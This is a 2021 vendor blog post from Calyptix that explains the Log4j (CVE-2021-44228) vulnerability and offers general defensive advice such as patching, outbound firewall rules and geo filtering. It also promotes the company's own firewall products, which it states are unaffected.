Log4j Vulnerability Log4j Vulnerability

Log4j Vulnerability

by Calyptix, December 15, 2021

A fresh zero-day attack with the ability to jeopardize the everyday operation of companies globally is in the news this week. Security researchers recently disclosed the vulnerability CVE-2021-44228 in Apache’s log4j, which is a common Java-based library used for logging purposes. The vulnerability only requires an attacker to send a specially crafted string to the logging functions. Specifically, the vulnerability is in the Java Naming and Directory Interface (JNDI) support of LDAP.

This exploit was first publicized when Minecraft players were warned hackers could execute malicious code on servers or clients running the Java version of the game. Patching quickly remedies things for the game’s users, but many other systems also rely on this same logging system.

Amazon Web Services, Microsoft, Cisco, Google Cloud and IBM were among major tech players affected by the Log4j vulnerability. Wired reported the exploit, “will continue to wreak havoc across the internet for years to come.” In a statement, US Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly described the flaw as “one of the most serious I’ve seen in my entire career, if not the most serious.”

 

What is a Zero-day Exploit?

Bad actors are determined to get in to systems and networks. They probe persistently until they find a previously unknown and unpatched flaw to access your system. Once they find a vulnerability, they hurry to write and install an attack before the developer discovers it.

This type of attack hurts business as it causes complications before you know it is there. That is why it is called a zero-day attack. Regrettably, it can take weeks, even months, to discover the attack.

 

What to do about Zero-day Attacks

CISA has an in-depth article that explains the origin of this exploit and guidance of what to do if you believe you have a system that may be affected.

In the meantime, you should always keep software up to date with security updates and patch to limit exposure to this and other types of cyberattack.

It is also best to limit the number of software applications you download. The more you use, the greater your risk of exposure.

You will also want to install a firewall to help maximize your system protection. Firewalls feature various automated tools that use whitelisting to check which apps should accept and reject internet access. Installing antivirus tools also works to block threats and keep your devices secure. Where most of these actions are automated, users should make judicious use of outbound filtering to limit what external resources their devices can reach. This is where Calyptix’s Community Shield really shines by utilizing the fleet of AccessEnforcer firewalls to identify and block outbound events that could compromise your network.

Here are some things that MSPs and IT managers can do to respond to this vulnerability:

 

  1. Review the port forwarding rules on firewalls and remove any rules that are no longer necessary or restrict them to just authorized IP addresses. Threat actors constantly probe public-facing Internet servers for things like the Log4j vulnerability, so reducing the number of systems that are accessible by them would reduce the possibility of being compromised.
  2. Where possible, set up restrictive outbound firewall rules to control access from internal machines to external systems. This is important because exploiting Log4j vulnerability involves a callback to the threat actor’s servers. By setting up outbound firewall rules, defenders have a chance to disrupt the attack and prevent it from succeeding.
  3. Set up geographic filtering e.g., Geo Fence. This will reduce the number of attacks and probes from countries that the organization does not do business with.
  4. Review all hardware and software that are used within the organization to identify any that might require updates in order to address Log4j vulnerability. There are several lists online that outline the status of various products and applications that indicate whether they are affected by the Log4j vulnerability, including:

https://github.com/NCSC-NL/log4shell/blob/main/software/README.md

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/

 

Calyptix Protection Against Log4j

Calyptix’s developers reviewed this vulnerability and have concluded that no systems within the AccessEnforcer line are affected. Adjacent systems such as Geo Fence, Gatekeeper, Community Shield and our backend systems are also unaffected.

To further ensure protection, we rolled out a blocklist of publicly known Log4j scanners and exploits on Friday, December 10th. ​​​​​Since then, our developers have continued working hard to build a threat feed specifically for this exploit as it pertains to outbound events.

Geo FenceNot Affected
GatekeeperNot Affected
Community ShieldNot Affected
Web FiltersNot Affected
Web ServerNot Affected

Calyptix’s AccessEnforcer is an all-in-one solution for network security and management. Our mission is to automatically block threats like hackers, spam, and malware. Our network tools keep small business connections fast and reliable. With Community Shield™ we have added a community-driven, proactive feature to further defend users.

Check out our Community Shield™ Log4j Dashboards.

No Comments


    Leave a Reply

    Your email address will not be published Required fields are marked *

    You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

    *